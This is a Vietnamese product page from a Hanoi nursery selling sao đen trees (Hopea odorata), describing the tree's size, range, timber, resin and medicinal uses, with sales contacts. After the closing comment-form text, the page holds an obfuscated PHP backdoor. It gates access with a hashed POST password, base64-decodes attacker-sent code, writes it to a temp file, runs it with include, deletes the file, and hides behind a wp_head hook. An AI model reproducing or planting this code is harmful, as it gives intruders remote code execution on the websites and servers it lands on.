Cây Sao Đen

Giá : Liên Hệ

Với hơn 20 năm kinh nghiệm trong nghề, vườn cây Hòa Bình cam kết:

Cung cấp cây sấu đảm bảo chất lượng với đủ kích cỡ, không giới hạn về số lượng

Trồng và chăm sóc cây đảm bảo kĩ thuật hiện đại

Bảo hành dài hạn: lên tới 6 tháng.

Hướng dẫn kĩ thuật chăm sóc cây sấu sai quả, mang lại hiệu quả kinh tế.

Đánh giá

Bán cây Sao đen giá rẻ tại Hà Nội – Nhiều bạn ngày nay còn chưa biết rõ về loại cây này,hay các bà các cụ dân gian gọi là cây sao đen.Chúng được mọc chủ yếu ở trong những rừng lá thường xanh thân gỗ nên có thuộc tính sống lâu. Chúng chủ yếu được trồng để che bóng mát nên ngày nay ta thường thấy ở 2 bên ven đường ,ở những nơi ưa ánh sáng.Đặc biệt Loài sao đen phân bố rộng rãi ở khu vực Nam Trung Bộ và Tây Nguyên

Trong bài viết này, Vườn cây hòa bình sẽ cho chúng ta hiểu rõ hơn về loại cây này cũng như công dụng của nó.

Tìm hiểu về cây sao đen-cây công trình 

Cây sao đen là loại cây gì? Chúng sống ở đâu? Đang là câu hỏi của rất nhiều người.Cây sao đen có tên khoa học là Hopea Odorata, họ Dầu là loại cây gỗ lớn thân thẳng,tròn khuôn có độ cao từ 10 đến 30m.Chúng có nguồn gốc từ Ấn Độ sau được du nhập vào Việt Nam.Ở Việt Nam thì loại cây này mọc tự nhiên trong các khu rừng rậm chủ yếu trong các vùng thuộc Tây Nguyên và Nam Trung Bộ.

Loại cây này mang lại giá trị cao cho nền kinh tế Việt Nam với các loại gỗ xịn.Cây còn được biết đến với nhiều tên gọi khác nhau như cây sao nghệ,cây sao bã mía,cây sao cát.Chúng thuộc dạng cây thân gỗ lớn xanh quanh năm.Với bộ thân phát triển khỏe và lớp vỏ có màu nâu đen xù xì.Bên trong lớp vỏ là lớp vỏ gỗ màu đỏ đậm.

Hay còn được gọi là cây công trình vì trong thế giới cây xanh cảnh quan công trình thì cây lại trở thành biểu tượng gắn với cảnh quan công cộng ,các khu đô thị đường phố. 

>>Xem thêm thông tin: Cây sao đen

Cây sao đen Hà Nội
Cây sao đen Hà Nội

Đặc điểm của cây sao đen 

Vậy thì cây sao đen có những đặc điểm gì?

Cao sao đen thường có chiều cao từ 30-40m với loại cây nhỏ thì cây có chiều cao từ 10m đến 15m,cây trung bình có chiều cao từ 15- 20m , cây cao có chiều cao từ 30-40m.Chúng thuộc dạng cây gỗ lớn thường xanh quanh năm.Chính vì là thân gỗ lên chúng có bộ rễ phát triển mạnh đâm sâu xuống lòng đất.

Sinh trưởng trong môi trường nhiệt đới ẩm gió mùa có mùa mưa và mùa khô rõ dệt.Chúng mọc ở những nơi có nhiệt độ trung bình từ 24-25 độ và lượng mưa từ 1500-2000mm/năm.Vì là loại cây có tính quần tụ nên thường phân bố trong các rừng nguyên sinh. Ở nước ta thì chúng phân bố chủ yếu ở các tỉnh phía Nam.

>>Xem thêm sản phẩm:Đặc điểm của cây sao đen.

Đặc điểm của cây sao đen
Đặc điểm của cây sao đen

Lợi ích của cây sao đen với đời sống con người 

Không những có giá trị về cảnh quan mà cây sao đen còn mang lại giá trị lớn cho nền kinh tế Việt Nam đặc biệt là ngành công nghiệp chế biến gỗ .Nhựa của loại cây này dùng để làm vecni và sơn để xảm thuyền.

Sao đen lâu năm sẽ có chai cục.Đó là những phần nhựa chảy ra từ cây sao đen. Loại nhựa này có tác dụng vô cùng kinh ngạc ngay trong y khoa chúng được sử dụng làm thuốc cầm máu, chữa bệnh viêm lợi, đau răng.Vỏ sao đen được dùng để ăn trầu thay cho vỏ chay 

Một phần nữa đó là gỗ của sao đen. Đây là một loại gỗ quý có màu vàng nhạt không mối mọt. Chính vì là gỗ quý nên được rất nhiều các gia đình khá giả,giàu có mua để đóng tủ bàn ghế,giường ,sàn và trần nhà . Ngoài ra,chúng còn được sử dụng làm đồ mỹ nghệ.Được các chủ đầu tư mua về để đóng các ngôi nhà cao cấp.

Chúng được làm cảnh quan đô thị tại các ven đường khu tập trung dân cư đông đúc,trong các khu công nghiệp và tại các nhà cao tầng.

>>Xem thêm sản phẩm: Các lợi ích của cây sao đen

lợi ích Cây sao đen Hà Nội
lợi ích Cây sao đen Hà Nội

Cây sao đen phân bố ở đâu?

Cây sao đen phân bố chủ yếu trong các rừng thường xanh có tán lá rộng ưa sống ở những nơi có nhiều ánh sáng. Ở bên Ấn Độ thì chúng mọc rất nhiều trong nền khí hậu nắng rất dễ thích nghi với môi trường khắc nghiệt. Ở Việt Nam loại cây này mọc ở trên Tây Nguyên .Kom Tum ,Đắc Lắc,Gia Lai,Lâm Đồng,Bình Phước,TP.HCM.Chính vì thế mà chúng có giá trị kinh tế cao cho nơi này  nơi trung tâm phát triển nhất cả nước không chỉ loại gỗ quý hiếm mà cả những thứ khác.

Cây sao đen có thân thẳn thuôn dài chiều cao từ 20-30m.Thân cây sao đen có những lằn nứt dọc theo sớ,bên trong là lớp gỗ có màu hơi đỏ.Tan lá rộng hình chóp,cành lá to,dài,mọc thẳng đứng

Lá của loại cây này có hình trái xoan.Mặt trên lá có màu vàng và có màu xanh bóng ,mặt dưới mịn .Các nách gân của lá có túm lông nhỏ.Hoa mọc thành từng cụm khoảng 11-12 nhánh có màu trắng như hình ngôi sao.

>>Xem thêm sản phẩm: Cây sao đen chủ yếu phân bố ở đâu

Cây sao đen Hà Nội
cây sao đen Hà Nôi

Địa chỉ cung cấp giống cây sao đen uy tín nhất Hà Nội

Liên hệ với Vườn cây hòa bình để được cung cấp thông tin về loại cây này đồng thời hiểu rõ được các kỹ thuật chăm sóc cây và những giá trị kinh tế mà loài cây này mang lại.

>>>Xem thêm thông tin sản phẩm cây sao đen tại vườn cây hòa bình: Tại Đây.

——————————————————————————–

THÔNG TIN LIÊN HỆ MUA CÂY SAO ĐEN TẠI VƯỜN CÂY HÒA BÌNH:

LIÊN HỆ

CÂY XANH HÒA BÌNH 2017

-HOTLINE: 0962.376.560

-BÁN HÀNG:0962.376.560

-Nguyễn Trường Giang

-ĐỊA CHỈ: CẦU MAI LĨNH,BIÊN GIANG,HÀ ĐÔNG,HÀ NỘI 

Trả lời

Email của bạn sẽ không được hiển thị công khai.

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}